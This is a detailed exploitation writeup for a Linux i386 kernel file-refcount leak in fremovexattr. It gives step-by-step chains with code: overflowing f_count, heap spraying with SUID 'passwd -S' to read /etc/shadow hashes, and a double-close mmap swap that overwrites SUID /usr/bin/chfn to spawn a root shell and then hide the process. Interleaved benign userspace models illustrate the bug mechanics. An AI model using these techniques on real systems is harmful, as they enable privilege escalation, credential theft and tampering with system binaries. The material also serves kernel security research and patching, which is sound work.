# CVE-2024-14027: Detailed Exploitation Writeup

## The Vulnerability

**Location**: `fs/xattr.c:952-976` (Linux 6.6.51 i386)

```c
SYSCALL_DEFINE2(fremovexattr, int, fd, const char __user *, name)
{
    struct fd f = fdget(fd);          // increments f_count only on the slow path (shared fd table)
    char kname[XATTR_NAME_MAX + 1];
    int error = -EBADF;

    if (!f.file)
        return error;

    error = strncpy_from_user(kname, name, sizeof(kname));
    if (error == 0 || error == sizeof(kname))
        error = -ERANGE;
    if (error < 0)
        return error;     // BUG: no fdput(f) — leaks one f_count reference

    // ... normal path calls fdput(f) at the end
    fdput(f);
    return error;
}
```

**Root cause**: Commit `c03185f4a23e` refactored `removexattr()` and moved `strncpy_from_user()` inline into `fremovexattr()`, but did not add `fdput(f)` to the new early error return (line 966). Each call that fails at the name copy (a bad `name` pointer, an empty name, or an over-long name) returns with one reference still held on the underlying `struct file`.

**Trigger**: Call `fremovexattr(fd, 0x1)`, where `0x1` is an unmapped userspace address. `strncpy_from_user()` returns `-EFAULT` and the function returns early without calling `fdput()`. The fd table must be shared (via `clone(CLONE_FILES)`) so that `fdget()` takes the slow path and actually increments `f_count`.
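
The leak pattern itself can be shown in a small userspace model. This is a sketch, not kernel code: `mock_file`, `mock_get`, `mock_put`, `mock_copy_name`, and the two `remove_*` functions are hypothetical stand-ins for `struct file`, the slow-path `fdget()`, `fdput()`, `strncpy_from_user()`, and the syscall body. It only illustrates how an early return that skips the put leaves one extra reference per failed call, and how a balanced version behaves.

```c
#include <assert.h>
#include <errno.h>
#include <stddef.h>

/* Hypothetical stand-in for struct file: only the reference count. */
struct mock_file { long f_count; };

/* Models a slow-path fdget(): takes one reference. */
static void mock_get(struct mock_file *f) { assert(f != NULL); f->f_count++; }

/* Models fdput(): drops one reference. */
static void mock_put(struct mock_file *f) { assert(f != NULL); f->f_count--; }

/* Models the name copy: a NULL name stands for a faulting user pointer. */
static int mock_copy_name(const char *name) { return name ? 0 : -EFAULT; }

/* Buggy shape: the early return skips the put. */
int remove_buggy(struct mock_file *f, const char *name)
{
    mock_get(f);
    int error = mock_copy_name(name);
    if (error < 0)
        return error;          /* one reference is leaked here */
    mock_put(f);
    return 0;
}

/* Balanced shape: every exit path drops the reference. */
int remove_balanced(struct mock_file *f, const char *name)
{
    mock_get(f);
    int error = mock_copy_name(name);
    mock_put(f);
    return error;
}
```

Calling `remove_buggy(&f, NULL)` repeatedly raises `f.f_count` by one each time, while `remove_balanced` leaves it unchanged.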

---

## Exploitation Method 1: `/etc/shadow` Read (exploit.c)

### Concept
Overflow `f_count` to wrap it to 0, then free the `struct file` via normal close operations. The freed slab slot is reclaimed by a SUID process (`passwd -S`) that opens `/etc/shadow`. A dangling fd in the exploit process now points to the `/etc/shadow` `struct file` — read it.

### Step-by-step

#### Phase 1: Setup — pipes first, then target file
```
pipe() x4              → 8 struct files allocated from filp slab cache
open("/tmp/target")    → target struct file on CURRENT cpu_slab page
dup(target_fd)         → f_count = 2 (target_fd + dangling_fd)
```

**Why pipes first**: SLUB allocates from per-CPU freelists. By allocating pipe files first, the target file lands on whatever page is current after those allocations. No more filp allocs happen until the target is freed, so the cpu_slab stays the same → the freed slot goes to the per-CPU freelist → the next filp alloc (by passwd) reclaims it.

#### Phase 2: Shared fd table for slow-path fdget
```
clone(CLONE_VM | CLONE_FILES) → idle child shares fd table
```

**Why**: `fdget()` reads `files->count`, the number of tasks sharing the fd table. If the count is greater than 1 (shared fd table), it takes the slow path: `atomic_long_inc_not_zero(&file->f_count)`. If the count is 1, it takes the fast path and just reads the pointer without touching f_count. We need the slow path during the overflow so that each `fremovexattr` call actually increments f_count.

#### Phase 3: Refcount overflow
```
3 worker threads (clone CLONE_VM | CLONE_FILES):
  tight loop: fremovexattr(target_fd, 0x1) → each call leaks +1 to f_count

Starting f_count: 2
Target leaks: 0xFFFFFFFE (4,294,967,294)
Final f_count: 2 + 0xFFFFFFFE = 0x100000000 = 0 (mod 2^32)
```

**Arithmetic**: `atomic_long_t` on i386 is 32 bits. `atomic_long_inc` wraps at 2^32. After 0xFFFFFFFE leaks, f_count is exactly 0. This wrap happens via *increment*, not via `dec_and_test`, so `__fput` is never triggered — the struct file stays allocated but with f_count=0.
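
The wrap arithmetic can be checked with plain unsigned 32-bit integers. The helper names `leaks_to_wrap` and `count_after` are illustrative only; the sketch assumes nothing beyond the counter being 32 bits wide, as the writeup states for i386.

```c
#include <assert.h>
#include <stdint.h>

static_assert(sizeof(uint32_t) == 4, "model assumes a 32-bit counter");

/* Increments needed to take a 32-bit counter from `start` to 0 (mod 2^32). */
uint32_t leaks_to_wrap(uint32_t start)
{
    return (uint32_t)0 - start;   /* unsigned arithmetic is modulo 2^32 */
}

/* Counter value after `leaks` increments, with 32-bit wraparound. */
uint32_t count_after(uint32_t start, uint32_t leaks)
{
    return start + leaks;
}
```

For a starting count of 2, `leaks_to_wrap(2)` is `0xFFFFFFFE`, and `count_after(2, 0xFFFFFFFE)` is 0, matching the figures above.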

**Performance**: ~3.7-4.7M leaks/sec with 3 workers on KVM. Total time: ~22 minutes.
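
As a sanity check on these figures, the quoted rates can be turned into a duration for the bulk phase. The helper `minutes_for` is a hypothetical name. Note that the rates alone give roughly 15 to 19 minutes, so the reported total of about 22 minutes presumably covers more than the bulk loop; the writeup does not break the difference down.

```c
#include <assert.h>
#include <stdint.h>

/* Minutes needed for `leaks` increments at `rate` increments per second. */
double minutes_for(uint64_t leaks, double rate)
{
    assert(rate > 0.0);
    return (double)leaks / rate / 60.0;
}
```

For example, `minutes_for(0xFFFFFFFEull, 4.7e6)` and `minutes_for(0xFFFFFFFEull, 3.7e6)` bound the bulk phase at the two quoted rates.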

**Bulk + precise finish**: The workers run until the count is within 10M of the target, then stop. The main thread performs the remaining leaks single-threaded so the final count is exact. If the workers overshoot, a fixup loop wraps the counter around again.

#### Phase 4: Enable fast-path fdget
```
kill(idle_child)  → files->count drops to 1
```

**Why**: With f_count=0, the path that any later `fdget()` on this fd takes matters:
- **Slow path** (files->count > 1): calls `atomic_long_inc_not_zero(f_count)`. f_count=0 → returns NULL → EBADF. We can't use the fd at all.
- **Fast path** (files->count == 1): just reads `fd_table[fd]` directly without touching f_count. This lets us access the struct file even though f_count=0.

Killing the idle child drops `files->count` from 2 to 1, enabling fast-path fdget for all subsequent fd operations.

#### Phase 5: Fork spawner and closer BEFORE free
```
fork() → spawner child (inherits target_fd + dangling_fd)
fork() → closer child (inherits target_fd + dangling_fd)
```

**Critical detail**: `fork()` calls `dup_fd()` → `get_file()` on every inherited fd. `get_file()` does `atomic_long_inc()`, which is **unconditional** (not `inc_not_zero`). Each fork therefore adds 2 to f_count, even when it starts at 0: once for target_fd and once for dangling_fd.

After 2 forks: f_count = 0 + 2 + 2 = 4

#### Phase 6: Free the struct file
```
closer child:  close(target_fd) → f_count 4→3
               close(dangling_fd) → f_count 3→2
parent:        close(target_fd) → f_count 2→1
spawner child: close(target_fd) → f_count 1→0 → dec_and_test SUCCEEDS → __fput → FREED
               close(dangling_fd) → another dec_and_test on freed slab (harmless)
```

**Key**: The spawner's close of target_fd does `dec_and_test(1→0)` = true → `__fput()` is called → struct file is freed via RCU callback → slab slot returns to SLUB freelist.

The parent keeps `dangling_fd` open. With fast-path fdget (files->count=1), any operation on `dangling_fd` reads the raw pointer from the fd table — pointing to freed/reused slab memory.

#### Phase 7: Spray via passwd -S
```
spawner child: continuous fork+execve("/usr/bin/passwd", "-S")
               each passwd opens /etc/shadow O_RDONLY → struct file allocated from filp slab
```

`passwd` is SUID root. When run with `-S`, it opens `/etc/shadow` as root. The `struct file` for `/etc/shadow` is allocated from the same filp slab cache as the freed target, and lands in the freed slot (same CPU, same page, per-CPU freelist reuse).

#### Phase 8: Sacrificial child monitoring
```
for (;;) {
    child = fork();
    if (child == 0) {
        // In sacrificial child:
        flags = fcntl(dangling_fd, F_GETFL);  // fast-path: reads stale fd pointer
        if (flags == O_RDONLY) {               // shadow opened O_RDONLY
            fstat(dangling_fd, &sb);
            if (sb.st_dev == shadow_dev && sb.st_ino == shadow_ino) {
                pread(dangling_fd, buf, 64K, 0);  // READ /etc/shadow!
                write to /tmp/shadow_dump
                _exit(0);  // SUCCESS
            }
        }
    }
    waitpid(child);  // if child crashed (kernel oops), parent retries
}
```

**Sacrificial child pattern** (from CVE-2022-22942): The stale fd points to freed or reused slab memory, so operations on it may dereference invalid pointers in the kernel (e.g., `f_path.mnt` is garbage and `path_init` dereferences it). If the child oopses, only the child dies; the parent survives and forks another.

**dev/ino match**: Before the exploit, we `stat("/etc/shadow")` to get the device and inode. The child's `fstat()` on the stale fd compares against these to confirm it's truly /etc/shadow (not /etc/passwd or something else the SUID process opened).
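
The device and inode comparison is ordinary POSIX usage and can be sketched on its own. The helper names `same_file`, `fd_is_path`, and `open_and_check` are hypothetical; the sketch only shows how two `stat` results are compared to decide whether a descriptor and a path name the same file.

```c
#include <assert.h>
#include <fcntl.h>
#include <stdbool.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

/* True when both stat results name the same file (same device and inode). */
bool same_file(const struct stat *a, const struct stat *b)
{
    assert(a != NULL && b != NULL);
    return a->st_dev == b->st_dev && a->st_ino == b->st_ino;
}

/* Returns 1 if fd refers to the file at path, 0 if not, -1 on error. */
int fd_is_path(int fd, const char *path)
{
    struct stat by_fd, by_path;
    if (fstat(fd, &by_fd) != 0 || stat(path, &by_path) != 0)
        return -1;
    return same_file(&by_fd, &by_path) ? 1 : 0;
}

/* Convenience wrapper: open open_path read-only and compare with expect_path. */
int open_and_check(const char *open_path, const char *expect_path)
{
    int fd = open(open_path, O_RDONLY);
    if (fd < 0)
        return -1;
    int result = fd_is_path(fd, expect_path);
    close(fd);
    return result;
}
```

Comparing both `st_dev` and `st_ino` matters because inode numbers are only unique within one filesystem.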

**Result**: Parent receives child's exit(0) → success. /etc/shadow contents (yescrypt password hashes) printed to stdout and saved to `/tmp/shadow_dump`.

---

## Exploitation Method 2: SUID Binary Overwrite → Root Shell (exploit_dc.c)

### Concept
Same refcount overflow, but instead of reading a privileged file, we use a **double-close technique** to overwrite a SUID root binary (`/usr/bin/chfn`) with our own code, then exec it for a root shell.

The double-close technique chains two UAFs: first to create a writable mmap, then to redirect that mmap's backing file to a SUID binary.

### Step-by-step

#### Phases 1-4: Identical to exploit.c
Pipes first → open target → clone idle child → overflow f_count to 0 → kill idle child for fast-path fdget.

#### Phase 5: Free the struct file via fork helper

This is where exploit_dc.c differs from exploit.c. After overflow, f_count=0.

**The problem**: Simply calling `close(target_fd)` runs `dec_and_test` on a count of 0. On a 32-bit `atomic_long_t`, that decrements the count to 0xFFFFFFFF and then tests whether the result is 0. It is not, so `__fput` is never called and the struct file is never freed.

**The fix**: Fork a helper child:
```c
pid_t free_pid = fork();
if (free_pid == 0) {
    close(target_fd);     // f_count 2→1 (dec_and_test: 1≠0)
    close(dangling_fd);   // f_count 1→0 (dec_and_test: 0=0 → __fput → FREED!)
    _exit(0);
}
waitpid(free_pid, NULL, 0);
close(target_fd);  // parent cleanup (harmless fput on freed memory)
```

`fork()` calls `get_file()`, an unconditional `atomic_long_inc`, once per inherited fd. Both fds refer to the same struct file, so starting from f_count=0:
- target_fd: 0 → 1
- dangling_fd: 1 → 2
- Net: f_count = 0 + 2 = 2

Child closes both → `dec_and_test(2→1)` no, `dec_and_test(1→0)` yes → `__fput()` → struct file freed via RCU.

Parent still has `dangling_fd` open. With fast-path fdget (files->count=1), it can access the freed slab slot.

#### Phase 6: Spray temp files to reclaim the slot
```c
for (i = 0; i < 256; i++) {
    temp_fds[i] = open("/var/tmp/.xtmp_N", O_RDWR | O_CREAT | O_TRUNC, 0600);
    unlink(path);
    ftruncate(temp_fds[i], prog_size);
}
```

256 temp files opened O_RDWR. Each `open()` allocates a `struct file` from the filp slab cache. One of them reclaims the freed slot. The `dangling_fd` now points to a temp file's struct file.

#### Phase 7: Identify which temp file reclaimed the slot
```c
flags = fcntl(dangling_fd, F_GETFL);     // fast-path: reads through stale pointer
fstat(dangling_fd, &stale_sb);           // get inode of whatever's in the slot
for (i = 0; i < 256; i++) {
    fstat(temp_fds[i], &sb);
    if (sb.st_ino == stale_sb.st_ino && sb.st_dev == stale_sb.st_dev) {
        match_fd = temp_fds[i];          // FOUND IT
        break;
    }
}
```

**Retry loop**: If the slot was taken by a kernel-internal file (not our temp file), close everything, wait 200ms, and spray again. Up to 20 retries with `readlink(/proc/self/fd/N)` diagnostics.

#### Phase 8: Create writable mmap (but DON'T touch it yet)
```c
void *mmap_addr = mmap(NULL, prog_size, PROT_READ | PROT_WRITE,
                        MAP_SHARED, match_fd, 0);
// Close ALL temp fds — mmap holds the last reference
for (i = 0; i < 256; i++) close(temp_fds[i]);
```

**Critical**: `mmap()` checks `PROT_WRITE` against `match_fd`'s file mode (O_RDWR) — this check passes because it's our temp file. The kernel creates a VMA with `vm_file` pointing to the temp file's struct file. `vm_file` holds a reference (f_count=1 after closing all temp fds).

**Lazy pages**: We don't touch the mapping yet. Page faults are resolved lazily, via `vm_file->f_mapping`. We want the faults to happen *after* we swap the struct file underneath.

#### Phase 9: Double close (second free)
```c
close(dangling_fd);  // fput on temp file's struct file
                     // f_count was 1 (only mmap ref) → 0 → __fput → FREED AGAIN
usleep(200000);      // RCU grace period
```

This is the **double close**. `dangling_fd` still points to the same struct file as `match_fd` (the temp file). Closing it calls `fput()` → `dec_and_test(1→0)` → `__fput()` → struct file freed via RCU.

The mmap's VMA still has `vm_file` pointing to the now-freed struct file. This is the second dangling reference.

#### Phase 10: Reallocate with SUID target
```c
for (i = 0; i < 256; i++)
    suid_fds[i] = open("/usr/bin/chfn", O_RDONLY);
```

256 opens of the SUID binary. One of them reclaims the freed slab slot. The mmap's `vm_file` now points to `/usr/bin/chfn`'s struct file. Specifically, `vm_file->f_mapping` now points to chfn's inode address_space.

#### Phase 11: Overwrite via mmap
```c
memcpy(mmap_addr, prog_addr, prog_size);
```

`memcpy` triggers page faults on the mmap. The kernel resolves each fault via:
1. `vma->vm_file` → points to chfn's struct file (swapped!)
2. `file->f_mapping` → chfn's inode address_space
3. Page cache lookup in chfn's address_space
4. Write lands in chfn's page cache → **overwrites /usr/bin/chfn on disk**

**Key insight**: The `PROT_WRITE` check was done at `mmap()` time against the temp file (O_RDWR). The kernel doesn't re-verify write permission when the struct file underneath changes to an O_RDONLY file. The VMA flags say "writable" and that's what the page fault handler honors.
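
The mmap-time check mentioned here is the ordinary one documented for `mmap(2)`: a shared writable mapping requires a descriptor opened for reading and writing. The sketch below demonstrates only that normal check on a scratch file. The function name `shared_write_mmap_errno` and the `/tmp/mmap_check_XXXXXX` template are assumptions made for illustration.

```c
#define _POSIX_C_SOURCE 200809L
#include <assert.h>
#include <errno.h>
#include <fcntl.h>
#include <stdlib.h>
#include <sys/mman.h>
#include <unistd.h>

/*
 * Creates a scratch file, reopens it with `open_flags`, and requests a
 * shared writable mapping. Returns 0 if mmap() succeeds, the errno value
 * if it fails, or -1 if the setup itself fails.
 */
int shared_write_mmap_errno(int open_flags)
{
    assert((open_flags & O_CREAT) == 0);      /* the file already exists */

    char path[] = "/tmp/mmap_check_XXXXXX";   /* hypothetical scratch path */
    int tmp = mkstemp(path);
    if (tmp < 0)
        return -1;
    if (ftruncate(tmp, 4096) != 0) {
        close(tmp);
        unlink(path);
        return -1;
    }

    int fd = open(path, open_flags);
    unlink(path);
    close(tmp);
    if (fd < 0)
        return -1;

    void *p = mmap(NULL, 4096, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0);
    int result = (p == MAP_FAILED) ? errno : 0;   /* read errno before cleanup */
    if (p != MAP_FAILED)
        munmap(p, 4096);
    close(fd);
    return result;
}
```

With `O_RDWR` the mapping succeeds, and with `O_RDONLY` it fails with `EACCES`. The check is made once, against the descriptor passed to `mmap()`, and the resulting writability is recorded in the VMA flags.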

#### Phase 12: Exec for root shell
```c
// exploit_dc.c starts with:
if (!geteuid()) {
    setuid(0); setgid(0);
    execve("/bin/sh", ...);
}

// After overwrite:
execve("/usr/bin/chfn", ...);  // chfn is now our binary, SUID root → euid=0 → /bin/sh
```

The overwritten chfn is our exploit binary. When exec'd, it's SUID root, so `geteuid() == 0`. The entry check triggers: `setuid(0)`, `setgid(0)`, `execve("/bin/sh")` → **root shell**.

#### Phase 13: Become a ghost
```c
setsid();
close(0); close(1); close(2);
sigfillset(&set); sigprocmask(SIG_BLOCK, &set, NULL);
for (;;) pause();
```

The mmap still holds a dangling `vm_file`. If the process exits, the VFS tries to clean up and hits `f_count=0` → kernel warning "VFS: Close: file count is 0" or worse, an oops. So the process daemonizes and sleeps forever to avoid triggering cleanup.

---